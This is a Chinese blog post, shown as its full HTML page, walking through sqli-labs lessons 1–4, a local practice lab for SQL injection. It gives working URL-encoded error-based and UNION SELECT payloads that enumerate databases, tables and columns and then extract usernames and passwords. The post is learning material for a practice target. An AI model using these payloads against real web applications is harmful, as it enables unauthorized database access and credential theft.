<!DOCTYPE html>
<html class="has-navbar-fixed-top">
<head>
    <meta charset="utf-8">
<title>sqli-labs less1-4初级版 - TulnersXu&#39;s Blog</title>
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.css">




<meta name="description" content="苟有恒，何须三更眠五更起。">





    <meta name="description" content="背景">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs less1-4初级版">
<meta property="og:url" content="http://example.com/2019/08/07/sqli-labs-less1-4%E5%88%9D%E7%BA%A7%E7%89%88/index.html">
<meta property="og:site_name" content="TulnersXu&#39;s Blog">
<meta property="og:description" content="背景">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2019-08-07T10:07:51.000Z">
<meta property="article:modified_time" content="2021-02-17T12:10:56.482Z">
<meta property="article:author" content="X1R">
<meta property="article:tag" content="sqli-labs, MySQL">
<meta name="twitter:card" content="summary">





<link rel="icon" href="/favicon.png">


<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Ovo|Source+Code+Pro">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/css/lightgallery.min.css">
<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/css/justifiedGallery.min.css">


<link rel="stylesheet" href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css">


<link rel="stylesheet" href="/css/style.css">





    
    
    
    
    
    
    
    
    
    

    


<meta name="generator" content="Hexo 5.4.2"></head>
<body>
    
<nav class="navbar is-transparent is-fixed-top navbar-main" role="navigation" aria-label="main navigation">
    <div class="container">
        <div class="navbar-brand">
            <a class="navbar-item navbar-logo" href="/">
                
                <img src="/images/logo.png" alt="" height="28">
                
            </a>
            <div class="navbar-burger">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
        
        <div class="navbar-menu navbar-start">
            
            <a class="navbar-item "
               href="/archives">Archives</a>
            
            <a class="navbar-item "
               href="/categories">Categories</a>
            
            <a class="navbar-item "
               href="/about">About</a>
            
        </div>
        
        <div class="navbar-menu navbar-end">
            
            
            <div class="navbar-item is-hoverable has-dropdown is-hidden-mobile is-hidden-tablet-only toc">
                <a class="navbar-item" title="Table of Contents">
                    <i class="fa fa-list"></i>
                </a>
                <div class="navbar-dropdown is-right">
                    
                    
                    
                    
                    <a class="navbar-item" href="#Less-1-“Error-Based-String”">1&nbsp;&nbsp;<b>Less-1 “Error Based- String”</b></a>
                    
                    
                    
                    <a class="navbar-item" href="#0-先照着提示键入ID，没报错">1.1&nbsp;&nbsp;0. 先照着提示键入ID，没报错</a>
                    
                    
                    
                    <a class="navbar-item" href="#1-找注入点，发现报错的回显">1.2&nbsp;&nbsp;1.找注入点，发现报错的回显</a>
                    
                    
                    
                    <a class="navbar-item" href="#2-接下来猜列数">1.3&nbsp;&nbsp;2.接下来猜列数</a>
                    
                    
                    
                    <a class="navbar-item" href="#3-使用联合注入">1.4&nbsp;&nbsp;3.使用联合注入</a>
                    
                    
                    
                    <a class="navbar-item" href="#4-爆数据库">1.5&nbsp;&nbsp;4.爆数据库</a>
                    
                    
                    
                    <a class="navbar-item" href="#5-爆数据库的表">1.6&nbsp;&nbsp;5.爆数据库的表</a>
                    
                    
                    
                    <a class="navbar-item" href="#6-爆表的列">1.7&nbsp;&nbsp;6.爆表的列</a>
                    
                    
                    
                    <a class="navbar-item" href="#7-爆数据">1.8&nbsp;&nbsp;7.爆数据</a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#Less-2-“Error-Based-Intiger”">2&nbsp;&nbsp;<b>Less-2 “Error Based- Intiger”</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#Less-3-“Error-Based-String-with-Twist-”">3&nbsp;&nbsp;<b>Less-3 “Error Based- String(with Twist)”</b></a>
                    
                    
                    <hr class="navbar-divider">
                    
                    
                    <a class="navbar-item" href="#Less-4-“Error-Based-DoubleQuotes-String”">4&nbsp;&nbsp;<b>Less-4 “Error Based- DoubleQuotes String”</b></a>
                    
                </div>
            </div>
            
            
        </div>
    </div>
</nav>

    <section class="section">
    <div class="container">
    <article class="article content gallery" itemscope itemprop="blogPost">
    <h1 class="article-title is-size-3 is-size-4-mobile" itemprop="name">
        
            sqli-labs less1-4初级版
        
    </h1>
    <div class="article-meta columns is-variable is-1 is-multiline is-mobile is-size-7-mobile">
        <span class="column is-narrow">
            
                <time datetime="2019-08-07T10:07:51.000Z" itemprop="datePublished">Aug 7 2019</time>
            
        </span>
        
        <span class="column is-narrow article-category">
            <i class="far fa-folder"></i>
            <a class="article-category-link" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a>
        </span>
        
        
        <span class="column is-narrow">
            
            
            4 minutes read (About 621 words)
        </span>
        
    </div>
    <div class="article-entry is-size-6-mobile" itemprop="articleBody">
    
        <html><head></head><body><p>背景</p>
<span id="more"></span>

<p>今天趁着刚做完还有点记忆，加上自己的理解遂write至此。OK，废话不多说</p>
<h3 id="Less-1-“Error-Based-String”"><a href="#Less-1-“Error-Based-String”" class="headerlink" title="Less-1 “Error Based- String”"></a>Less-1 “Error Based- String”</h3><h4 id="0-先照着提示键入ID，没报错"><a href="#0-先照着提示键入ID，没报错" class="headerlink" title="0. 先照着提示键入ID，没报错"></a>0. 先照着提示键入ID，没报错</h4><h4 id="1-找注入点，发现报错的回显"><a href="#1-找注入点，发现报错的回显" class="headerlink" title="1.找注入点，发现报错的回显"></a>1.找注入点，发现报错的回显</h4><pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=1%27
</code></pre>
<p>看到报错语句：<br>    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’ LIMIT 0,1’ at line 1</p>
<p>键入的1已经闭合，后面的内容直接注释–+或者%23 (%23是#的url编码，这里之前想到用#，但是发现并没用，可能是没对#进行url编码。)</p>
<pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=1%27%23
</code></pre>
<h4 id="2-接下来猜列数"><a href="#2-接下来猜列数" class="headerlink" title="2.接下来猜列数"></a>2.接下来猜列数</h4><p>先来说说Order by，其是对前面的数据进行排序。还有一些细节方面的可以看下<a target="_blank" rel="noopener" href="https://segmentfault.com/a/1190000002655427">https://segmentfault.com/a/1190000002655427</a></p>
<pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%203%23
</code></pre>
<p>没报错</p>
<pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=1%27%20order%20by%204%23
</code></pre>
<p>提示<br>    Unknown column ‘4’ in ‘order clause’</p>
<p>可判断出列数为3</p>
<h4 id="3-使用联合注入"><a href="#3-使用联合注入" class="headerlink" title="3.使用联合注入"></a>3.使用联合注入</h4><p>union 联合注入,union 的作用是将两个 sql 语句进行联合。</p>
<pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1%27%20%20union%20select%201,2,3%23
</code></pre>
<p>这里为什么用-1呢？<br>当 id 的数据在数据库中不存在时,(此时我们可以 id=-1,两个 sql 语句进行联合操作时,当前一个语句选择的内容为空,我们这里就将后面的语句的内容显示出来)此处前台页面返回了我们构造的 union 的数据。</p>
<p>接下来会用到一些数据库的知识<a target="_blank" rel="noopener" href="https://blog.csdn.net/kikajack/article/details/80065753">https://blog.csdn.net/kikajack/article/details/80065753</a></p>
<h4 id="4-爆数据库"><a href="#4-爆数据库" class="headerlink" title="4.爆数据库"></a>4.爆数据库</h4><pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata%23
</code></pre>
<h4 id="5-爆数据库的表"><a href="#5-爆数据库的表" class="headerlink" title="5.爆数据库的表"></a>5.爆数据库的表</h4><pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%23
</code></pre>
<h4 id="6-爆表的列"><a href="#6-爆表的列" class="headerlink" title="6.爆表的列"></a>6.爆表的列</h4><pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name='表名'%23
</code></pre>
<h4 id="7-爆数据"><a href="#7-爆数据" class="headerlink" title="7.爆数据"></a>7.爆数据</h4><pre><code>http://127.0.0.1/sqli-labs/Less-1/?id=-1%27%20union%20select%201,group_concat(id,username,password),3%20from%20users%23
</code></pre>
<p>也可以根据提示看自己想爆的数据。</p>
<h3 id="Less-2-“Error-Based-Intiger”"><a href="#Less-2-“Error-Based-Intiger”" class="headerlink" title="Less-2 “Error Based- Intiger”"></a>Less-2 “Error Based- Intiger”</h3><p>按照Less-1把’去掉即可拿到数据。</p>
<h3 id="Less-3-“Error-Based-String-with-Twist-”"><a href="#Less-3-“Error-Based-String-with-Twist-”" class="headerlink" title="Less-3 “Error Based- String(with Twist)”"></a>Less-3 “Error Based- String(with Twist)”</h3><p>尝试用’去注入的时候提示<br>     You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’1’’) LIMIT 0,1’ at line 1 </p>
<p>少)，加上会提示</p>
<pre><code>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1 
</code></pre>
<p>闭合了</p>
<p>按照less-1步骤即可拿到数据。</p>
<h3 id="Less-4-“Error-Based-DoubleQuotes-String”"><a href="#Less-4-“Error-Based-DoubleQuotes-String”" class="headerlink" title="Less-4 “Error Based- DoubleQuotes String”"></a>Less-4 “Error Based- DoubleQuotes String”</h3><p>按照less-3’换成”即可拿到数据。</p>
</body></html>
    
    </div>
    
    <div class="columns is-variable is-1 is-multiline is-mobile">
    
        <span class="column is-narrow"><a class="tag is-light article-tag" href="/tags/sqli-labs-MySQL/">#sqli-labs, MySQL</a></span>
    
    </div>
    
    
    <div class="columns is-mobile is-multiline article-nav">
        <span class="column is-12-mobile is-half-desktop  article-nav-prev">
            
            <a href="/2019/08/09/Python%E4%B8%AD%E7%9A%84regr-%E5%87%BD%E6%95%B0/">Python中的regr()函数</a>
            
        </span>
        <span class="column is-12-mobile is-half-desktop  article-nav-next">
            
            <a href="/2019/08/06/Failed_to_start_php_fpm_service_Unit_php_fpm_service_not_found/">Failed to start php-fpm.service: Unit php-fpm.service not found.</a>
            
        </span>
    </div>
    
</article>




<div class="comments">
    <h3 class="title is-4">Comments</h3>
    
<div id="SOHUCS" sid="2019/08/07/sqli-labs-less1-4初级版/"></div>
<script charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/changyan.js" ></script>
<script type="text/javascript">
window.changyan.api.config({
    appid: 'cyv4cV7wa',
    conf: '36cfe50d5b00bf2874f82a61d59d9a8a'
});
</script>

</div>

    </div>
</section>
    <footer class="footer">
    <div class="container">
        <div class="columns content">
            <div class="column is-narrow has-text-centered">
                &copy; 2022 X1R&nbsp;
                Powered by <a href="http://hexo.io/" target="_blank">Hexo</a> & <a
                        target="_blank" rel="noopener" href="http://github.com/ppoffice/hexo-theme-minos">Minos</a>
            </div>
            <div class="column is-hidden-mobile"></div>
            
            <div class="column is-narrow">
                <div class="columns is-mobile is-multiline is-centered">
                
                    
                <a class="column is-narrow has-text-black" title="GitHub" target="_blank" rel="noopener" href="https://github.com/TulnersXu">
                    
                    GitHub
                    
                </a>
                
                </div>
            </div>
            
            
        </div>
    </div>
</footer>
    <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script>

<!-- test if the browser is outdated -->
<div id="outdated">
    <h6>Your browser is out-of-date!</h6>
    <p>Update your browser to view this website correctly. <a id="btnUpdateBrowser" target="_blank" rel="noopener" href="http://outdatedbrowser.com/">Update my browser now </a></p>
    <p class="last"><a href="#" id="btnCloseUpdateBrowser" title="Close">&times;</a></p>
</div>
<script src="//cdnjs.cloudflare.com/ajax/libs/outdated-browser/1.1.5/outdatedbrowser.min.js"></script>
<script>
    $(document).ready(function () {
        // plugin function, place inside DOM ready function
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        })
    });
</script>

<script>
    window.FontAwesomeConfig = {
        searchPseudoElements: true
    }
    moment.locale("en-AU");
</script>


    
    
<script src="https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.4/MathJax.js?config=TeX-MML-AM_CHTML"></script>
<script>
    MathJax.Hub.Config({
        "HTML-CSS": {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
</script>

    
    
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.css" integrity="sha384-9eLZqc9ds8eNjO3TmqPeYcDj8n+Qfa4nuSiGYa6DjLNcv9BtN69ZIulL9+8CqC9Y" crossorigin="anonymous">
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/katex.min.js" integrity="sha384-K3vbOmF2BtaVai+Qk37uypf7VrgBubhQreNQe9aGsz9lB63dIFiQVlJbr92dw2Lx" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.10.0/dist/contrib/auto-render.min.js" integrity="sha384-kmZOZB5ObwgQnS/DuDg6TScgOiWWBiVt0plIRkZCmE6rDZGrEOQeHM5PcHi+nyqe" crossorigin="anonymous"
        onload="renderMathInElement(document.body);"></script>

<script>
document.addEventListener("DOMContentLoaded", function() {
    renderMathInElement(document.body, {
        // ...options...
    });
});
</script>

    
    
<script src="//cdnjs.cloudflare.com/ajax/libs/lightgallery/1.6.8/js/lightgallery-all.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/justifiedGallery/3.6.5/js/jquery.justifiedGallery.min.js"></script>
<script>
    (function ($) {
        $(document).ready(function () {
            if (typeof($.fn.lightGallery) === 'function') {
                $('.article.gallery').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof($.fn.justifiedGallery) === 'function') {
                $('.justified-gallery').justifiedGallery();
            }
        });
    })(jQuery);
</script>

    
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.0/clipboard.min.js"></script>
    <style>
        .hljs {
            position: relative;
        }

        .hljs .clipboard-btn {
            float: right;
            color: #9a9a9a;
            background: none;
            border: none;
            cursor: pointer;
        }

        .hljs .clipboard-btn:hover {
          color: #8a8a8a;
        }

        .hljs > .clipboard-btn {
            display: none;
            position: absolute;
            right: 4px;
            top: 4px;
        }

        .hljs:hover > .clipboard-btn {
            display: inline;
        }

        .hljs > figcaption > .clipboard-btn {
            margin-right: 4px;
        }
    </style>
    <script>
      $(document).ready(function () {
        $('figure.hljs').each(function(i, figure) {
          var codeId = 'code-' + i;
          var code = figure.querySelector('.code');
          var copyButton = $('<button>Copy <i class="far fa-clipboard"></i></button>');
          code.id = codeId;
          copyButton.addClass('clipboard-btn');
          copyButton.attr('data-clipboard-target-id', codeId);

          var figcaption = figure.querySelector('figcaption');

          if (figcaption) {
            figcaption.append(copyButton[0]);
          } else {
            figure.prepend(copyButton[0]);
          }
        })

        var clipboard = new ClipboardJS('.clipboard-btn', {
          target: function(trigger) {
            return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
          }
        });
        clipboard.on('success', function(e) {
          e.clearSelection();
        })
      })
    </script>

    
    

    



<script src="/js/script.js"></script>


    
</body>
</html>